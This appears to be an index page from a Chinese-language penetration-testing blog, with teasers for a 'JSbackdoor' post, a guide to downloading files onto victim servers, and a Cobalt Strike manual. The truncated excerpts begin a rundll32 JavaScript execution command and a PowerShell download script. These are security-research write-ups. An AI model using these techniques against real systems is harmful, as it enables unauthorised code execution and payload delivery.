JSbackdoor

in 奇技淫巧 read (1090)

//Execute A Command rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript...

Continue reading

13种方式下载文件

in 技术分享 read (1294)

渗透测试过程中常常遇到需要将文件下载到受害者服务器上,这里介绍15种下载文件的方式,希望能帮助到你。 0x01 Powershell 创建如下PSH脚本: $p = New-Object System.Net.WebClient $p.DownloadFile("...

Continue reading

Cobalt strike3.0使用手册

in 工具收集 read (2386)

Cobalt strike3.0使用手册 0x00 简介 Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,offi...

Continue reading

Evi1cg

The way to be safe is never to be secure !